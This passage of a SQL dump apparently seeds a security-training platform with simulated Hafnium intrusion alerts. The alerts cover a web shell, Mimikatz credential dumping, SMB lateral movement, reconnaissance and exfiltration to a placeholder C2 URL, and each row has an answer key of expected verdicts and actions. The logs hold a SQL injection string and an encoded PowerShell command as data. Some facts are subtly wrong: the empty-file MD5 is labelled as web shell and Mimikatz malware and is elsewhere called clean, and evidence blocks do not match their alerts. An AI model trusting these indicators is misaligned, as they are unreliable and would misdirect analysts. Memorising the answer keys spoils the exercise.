Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System 
event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(340, 'Web Shell Deployment - China Chopper', 'high', 'Web server logs', 'Following initial access, Hafnium deploys the China Chopper web shell to maintain persistent access and command capabilities on the compromised server. The web shell allows remote control and execution of commands on the server.', 'Malware Installation', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"http_method\":\"POST\",\"requested_url\":\"/uploads/chopper.jsp\",\"response_code\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\",\"filename\":\"chopper.jsp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"webadmin\"}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known hash for China Chopper web shell\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"chopper.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Web shell filename used by attackers\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"webadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Username for web server 
administration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 
Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(341, 'Credential Harvesting via Mimikatz', 'critical', 'Endpoint detection logs', 'With web shell access established, Hafnium utilizes Mimikatz to extract credentials, enabling further infiltration within the network. Endpoint detection identified the execution of the Mimikatz tool to dump credentials from LSASS.', 'Credential Access', 'T1003: Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"process_name\":\"mimikatz.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"detection_method\":\"behavioral\",\"alert_trigger\":\"Unauthorized credential dump detected\",\"host_ip\":\"192.168.1.25\",\"host_name\":\"workstation-01\"}', '2026-01-03 00:04:00', '2026-02-18 12:29:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Match with known Mimikatz hash\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(342, 'Lateral Movement Through SMB', 'high', 'Network traffic analysis', 'Using harvested credentials, Hafnium moves laterally across the network over SMB, authenticating to the administrative C$ share on additional hosts (network logon, event 4624 with logon type 3) rather than exploiting an SMB vulnerability, and targeting additional critical systems. Because the logon itself is valid, resetting the abused credentials matters as much as isolating the source host.', 'Network Propagation', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.15.23\",\"protocol\":\"SMB\",\"action\":\"Access Granted\",\"username\":\"j.doe\",\"file_accessed\":\"\\\\\\\\192.168.15.23\\\\C$\\\\Windows\\\\system32\\\\cmd.exe\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"event_id\":4624,\"message\":\"An account was successfully logged on\",\"logon_type\":3}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium APT IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with Hafnium\'s lateral movement tools\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid corporate user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, 
NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(343, 'Execution of Reconnaissance Commands', 'high', 'Command-line audit logs', 'Hafnium executed a series of reconnaissance commands to map the network and locate key data repositories. This activity is indicative of an advanced attack with the objective of identifying sensitive data and valuable assets within the target organization.', 'Reconnaissance', 'T1016 - System Network Configuration Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:56Z\",\"event_id\":4624,\"command\":\"netstat -an; ipconfig /all; systeminfo\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"filename\":\"network_recon_tool.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Hafnium APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"network_recon_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"Unusual tool executed on the endpoint by a compromised user.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious software used by Hafnium.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(344, 'Data Collection for Exfiltration', 'high', 'File access logs', 'An advanced threat actor, identified as Hafnium, has aggregated sensitive information. The data is being prepared for exfiltration. This activity was detected through abnormal file access patterns linked to known malicious IP addresses.', 'Data Collection', 'T1005: Data from Local System', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:23:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"username\":\"j.doe\",\"file_accessed\":\"/financial_reports/2023/Q3_financials.xlsx\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"action\":\"read\",\"status\":\"success\"}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual file access patterns detected.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/financial_reports/2023/Q3_financials.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Monitoring System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during off-hours by suspicious IP.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by 
Hafnium.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(345, 'Data Exfiltration via HTTP POST', 'critical', 'Network traffic logs', 'Anomalous outbound traffic detected from an internal host to a known malicious IP, indicating possible data exfiltration via HTTP POST requests.', 'Data Exfiltration', 'T1041', 1, 'resolved', 34, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"http_method\":\"POST\",\"url\":\"http://malicious-cc-server.com/upload\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\",\"filename\":\"exfiltrated_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"john_doe\",\"response_code\":200}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of possibly compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-cc-server.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"URL linked to data exfiltration activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"clean\",\"details\":\"File hash not previously associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account potentially used during 
